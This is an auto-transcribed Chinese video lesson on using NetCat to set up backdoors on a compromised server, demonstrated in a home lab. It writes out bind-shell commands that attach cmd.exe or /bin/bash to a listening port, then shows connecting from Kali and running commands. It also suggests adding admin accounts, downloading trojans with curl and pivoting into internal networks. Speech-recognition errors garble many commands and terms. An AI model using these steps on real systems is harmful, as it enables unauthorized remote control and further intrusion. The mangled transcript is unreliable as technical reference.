Hello,欢迎来到小风教程网,我是Sor 那这个视频我教大家如何使用NetCat 瑞士金刀建立这么一个后门 它的使用场景只有一个 它的单纯的这么一个目的呢 就是获取到目标的这么一个命令执行的这么一个权限 那当目标机器上存在NetCat之后呢 我们就可以使用NetCat进行这么一个建立后门 在实现执行目标的这么一个命令的功能 那就是它这么一个使用场景 这个使用场景很强大啊 因为在有的时候啊 我们在做渗透 我们在拿到了这么一个网站 它存在这么一个命令执行的情况下 那刚好呢 它网站的服务器它存在这么一个NetCat 我们就是可以使用它的这么一个NetCat这么一个服务端 与我们黑客的主机客户端进行这么一个连接后门 那我们这么一个黑客的主机呢 客户端就可以远程对它服务器 服务端进行这么一个执行命令的这么一个功能 那我们既然就可以执行命令了 那我们就可以一步一步的这么一个渗透进 它这么一个服务器的这么一个内网 最终拿到这么一个内网的这么一些权限啊 一些等等等等的 那这就是它这么一个使用的这么一个场景 那我首先我讲一下这么一个Windows 建立后面的这么一个使用方法 首先我们使用一个监听 这么一个后门 首先我们这么一个NC 是吧 NC-L代表监听 -P呢 就是代表这么一个指定的这么一个端口 好 然后我们再来一个刚一 刚一呢 就是返回一个这么一个CMD 这么一个程序啊 然后我们连接呢 就是使用我们的卡里 使用NC-L NC-IP 就是我们的这么一个温时的IP 然后一个端口 最后一个-E 再指定这么一个CMD.EXE 那当然啊 你可以不加这个参数也是可以的 那我们来试一下 我们来试一下 首先啊 我们来打开我们的温时的CMD窗口 来 来到NC的这么一个文件夹里面 然后输入CMD 然后这个时候呢 我们就直接进入到这么一个汇括框了 那我们的手机来看一下我们温时的IP是多少 IP-Config 这边IP呢 是1920168 1.014 是吧 啊 那我们就是NC-L-P 然后4444 然后一个-E 啊 返回一个什么连接端呢 就返回一个CMD.EXE 是吧 啊 那我们回撤 啊 这边呢 它在监听是吧 啊 我把这边给拉过来一些 方便大家来观看 好 那这个时候呢 我们使用NC 哎 后面指定一个IP192.168.1.104 后面再指定这么一个端稿 4444 哎 这样我们就可以成功对它进这么一个命令执行了 这边是乱码啊 这边乱码的话 大家可以改一下这些 啊 编码 因为这边 在Windows下默认的这么一个DOS窗口的编码是GBK啊 是GBK 看到没有 是GBK 如果我们想要这边也显示这么一个东西的话 啊 那我们需要调一下编码 编码的话就是在 我看一下 应该是在这里吧 啊 啊 啊 这边是 使用hiker 这是字体 然后 啊 GBK 这边是编码 我们再来重新试一下 啊 这边还是不行啊 还是不行 啊 我来看一下 在这个 应该是这个GBK吧 不是吗 它这个新版本 它这个编码 我找不到 老版本的话 就是在这里 这边是 这边是快捷键 然后这边的话 也不是 啊 这边我们不管了 啊 这边不管了 因为这个新版本的话 我还没有研究过 它这么一个终端 啊 啊 它这个终端和之前的 啊 啊 卡里20 啊 量 2.0 是不一样的 是不一样的 啊 那这个时候呢 我们就可以执行一些命令 是吧 VMI 看一下当前的这么一个系统权限 是Administrator 这么一个管理员权限 是吧 我们还可以看一下 它的这么一个开放端口 Net.stad.no 啊 我之前的课程也讲过 这个命令呢 就是看一下 它这么一个端口开放服务 哎 这样呢 我们就可以直接在我们本地 去执行一些命令 去看到它 它这么一些 呃 这些服务啊 以及还可以添加什么呢 添加这么一个 呃 管理员账号和密码 因为你在这里执行的命令 的权限 是继承到这么一个啊 我们的客户端的这么一个权限的 因为按道理来说 我们这边哎 执行的这么一个命令 当前的权限是什么 那我们这边的权限就是什么 就好比我们这边是一个管理员权限 那我们这边监听了之后呢 这边也是管理员权限 假如我们这边是一个系统权限 那我们这边的话也是系统权限 啊 也可以完成一些系统权限的这么一些操作 那这是这么一个继承的这么一个关系哈 好 好我们终止一下 这这就是我们讲的这么一个Windows 建立后面的这么一个方法 啊 那后面呢 我讲一下这个Linux建立后面 因为我们卡里呢 是Linux 是吧 是一个啊 迪拜这么一个东西 好 然后我们怎么用呢 啊 我们首先啊 和刚才Windows是一样的 啊 是是一样的 只不过刚一后面的参数呢 是一个 Bing 一个Bash 啊 他这个什么呢 他这个呢 就是啊 Linux 执行命令的这么一个文件 啊 因为他这个是以根目录区分码 根目录下 Bing目录下 一个Bash文件 啊 这个Bash文件呢 就可以 啊 就可以去连接它 就可以去执行这么一个命令 啊 那我们来试一下 首先呢 我们来看一下 卡里的IP是多少 if config是吧 192.168 159.128 是吧 啊 那么就NC -L -P 44444-E 然后 Bing Bash 好 然后我们来等待一下 然后这个时候呢 我们就可以去连接到它 啊 NC 然后 - 192.168.159.128 好像是128吧 啊 128 然后一个-E 后面跟上它这么一个端口 其实跟上它这么一个端口就可以了呀 是吧 这样呢 我们就可以直接命令 ID呢 就是查看它这么一个权限 是RAW的权限 和HMI RAW的LS 试试当前这么一个目录 LS S-呀 这边 还可以看什么呢 还可以看它桌面的这么一个文件 是吧 CT SMB 点T下地 它这边没有返回啊 那我们不管 还有一个 PWE 查看当前目录 我们CD点点 挑回上一层这么一个目录 再来一个LS 即使这么一个东西啊 还可以看一下当前这么一些 啊 东西啊 还可以下载文件啊 我们还可以CURL 还可以下载一些远程文件 交比我们想下载一些远程这么一些 啊 木码文件 到它这么一个服务器 这么一个主机也是可以的 因为我们现在就在它这么一个主机内部啊 那这是这么一个原理 好 那这就是我今天所讲的这么一个啊 啊 Nedicad的建立后门啊 那我们来回顾一下 总结一下 首先呢 它的应用场景啊 就是获取到目标的这么一个命令执行 啊 那首先它第一个Windows 建立后门的使用方法呢 就是NC -L-P 然后指定一个端口 后面呢 一个-E 最主要的就是这个 这个-E的这么一个参数 你要返回哪个程序 啊 就返回这么个CMD.EXE 是吧 就返回这么一个执行命令的这么一个啊 程序 给我们的这么一个客户带 啊 那这是这么一个Windows的 那Linux的话就和啊 Windows的相似 只不过呢 它加了一个-E的这么一个参数 -E的话就是啊 和刚才Windows的这么一个啊执行命令的这么一个程序是一样的 只不过Linux呢 Windows的是不一样的啊 那Linux的话就是跟目录下并目录下的一个Bash文件 而Windows的话就直接输一个CMD.EXE就可以了 因为Windows下它自带的这么一个环境变量 是直接可以执行这么一个啊命令的啊 那这就是我今天所讲的这么一个使用NetCAD建立一个后门啊 那这一课就到这 感谢大家的收看 感谢大家的观看